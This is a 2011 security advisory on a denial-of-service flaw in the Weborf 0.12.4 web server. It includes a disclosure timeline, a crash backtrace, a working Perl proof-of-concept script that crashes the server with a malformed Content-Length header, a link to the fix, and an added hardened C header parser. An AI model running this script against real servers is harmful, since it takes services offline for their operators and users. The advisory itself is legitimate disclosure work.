Weborf 0.12.4 Denial Of Service

Posted Mar 7, 2011
Authored by ipax | Site dclabs.com.br

Weborf version 0.12.4 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | a74391cf47717ba11a1fc53abc5379b1100e6c85a4c5af8cdff811aa1a70b41b

[Discussion]

- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]

- Weborf-0.12.4 (Denial-of-Service)

[Vendor Product Description]

- Weborf is a lightweight webserver designed to rapidly share
directories. Runs on POSIX systems.

- Source: http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.4.tar.gz

[Advisory Timeline]

- 01/27/2011 -> Advisory sent to vendor.
- 01/27/2011 -> Vendor response. (Requesting more information)
- 01/27/2011 -> Full debug analysis and exploit sent.
- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Incorrect parsing of the Content-Length entity-header.

[Impact]

- Low

[Affected Version]

- 0.12.4
- Prior versions may also be affected but were not tested.

[Bug Description and Proof of Concept]

- The webserver crashes due to an error when handling certain HTTP
fields. This could be exploited to terminate an affected server, e.g.
via specially crafted HTTP headers containing wide characters.

(gdb) bt
#0  0xb7ec8bd1 in memcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x0804dec5 in get_param_value (
    http_param=0x805af95 "HTTP/1.1\r\nHost: http://www.dclabs.com.br\r\nContent-Length0\r\n",
    parameter=0x804fe79 "Content-Length", buf=0xb3e46095 "", size=15, param_len=14) at utils.c:281
#2  0x0804cfa1 in read_post_data (sock=0, connection_prop=0xb3e462f8, read_b=0xb3e462d4) at instance.c:1173
#3  0x00000000 in ?? ()

[PoC]

#!/usr/bin/perl
# Weborf-0.12.4 (Denial of Service)
use IO::Socket;

if (@ARGV < 1) {
        usage();
}
$ip     = $ARGV[0];
$port   = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
print $socket "Host: http://www.dclabs.com.br\r\n";
print $socket "Content-Length0\r\n\r\n";
sleep(1);
close($socket);
print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

Upgrade to the latest version at:
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.5.tar.gz
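
For code that cannot be upgraded immediately or that parses headers in a similar way, the following added example (not Weborf's code and not the vendor's fix) shows a header lookup in the role of the get_param_value frame from the backtrace, hardened so that a line such as "Content-Length0" is rejected before any copy takes place. The function names header_value and content_length are hypothetical.

```c
#include <limits.h>
#include <string.h>
#include <strings.h>

/* Added example, not Weborf's code. Copies the value of header `name` into
 * buf. Returns its length, or -1 if the header is absent, lacks the ':'
 * delimiter, or does not fit in buf (rejected, never truncated). */
int header_value(const char *headers, const char *name, char *buf, size_t size)
{
    size_t name_len = strlen(name);
    const char *line = headers;

    if (size == 0) return -1;
    buf[0] = '\0';
    while (line != NULL && *line != '\0') {
        const char *eol = strstr(line, "\r\n");
        size_t line_len = eol ? (size_t)(eol - line) : strlen(line);

        /* "Content-Length0" fails here: no ':' follows the name. */
        if (line_len > name_len && line[name_len] == ':' &&
            strncasecmp(line, name, name_len) == 0) {
            const char *val = line + name_len + 1, *end = line + line_len;
            while (val < end && (*val == ' ' || *val == '\t')) val++;
            while (end > val && (end[-1] == ' ' || end[-1] == '\t')) end--;
            size_t val_len = (size_t)(end - val);
            if (val_len >= size) return -1;
            memcpy(buf, val, val_len);   /* val_len < size was checked */
            buf[val_len] = '\0';
            return (int)val_len;
        }
        line = eol ? eol + 2 : NULL;
    }
    return -1;
}

/* Strict Content-Length: decimal digits only, no overflow. -1 = invalid. */
long content_length(const char *headers)
{
    char v[20];
    long total = 0;
    int n = header_value(headers, "Content-Length", v, sizeof v);

    if (n <= 0) return -1;
    for (int i = 0; i < n; i++) {
        if (v[i] < '0' || v[i] > '9') return -1;
        if (total > (LONG_MAX - 9) / 10) return -1;
        total = total * 10 + (v[i] - '0');
    }
    return total;
}
```

A caller should treat -1 from content_length as a malformed request and answer with 400 Bad Request instead of reading a body.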

[Greetz]
DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br